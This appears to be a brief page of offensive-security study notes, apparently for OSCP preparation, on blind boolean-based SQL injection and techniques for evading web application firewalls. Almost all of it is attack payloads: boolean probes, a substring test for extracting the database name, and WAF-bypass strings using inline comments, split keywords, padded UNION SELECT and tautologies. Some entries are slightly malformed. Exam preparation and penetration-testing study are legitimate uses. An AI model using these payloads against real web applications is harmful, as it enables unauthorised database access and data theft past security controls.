> For the complete documentation index, see [llms.txt](https://h3ckt0r.gitbook.io/0xsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://h3ckt0r.gitbook.io/0xsec/offensive-security/oscp/module-9-web-application-attacks/sql-injection/blind-boolean-based-sql-and-evasion-techniques.md).

# Blind Boolean based SQL & Evasion Techniques

## Blind Boolean based SQL

* 11' and 'N' = 'N TRUE
* 11' and 'N'= 'A False
* substring('Ahmed'.1.1)='A' => True

```
select substring(database(),1,1)='d'
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FZp4hAVQyZI8kDF62CXvy%2Fimage.png?alt=media&amp;token=b88d99ba-76af-4cca-9057-f08b705411a4" alt=""><figcaption></figcaption></figure>

## Evasion Techniques

* WAF
  * ' or 1-1 --+&#x20;
    * or 2>1
    * 'or 'hacktor'>'a'
  * '/\*!<mark style="color:red;">**12345**</mark>order\*/by 7#
  * url encode,hex etc..
  * EXEC('sele','ct')
  * "UNION       SELECT"
  * '/\*\***/or/\*\*/1/\*\*/=/\*\*/1/\*\*/**
  * **Hackbar => Cyberfox**
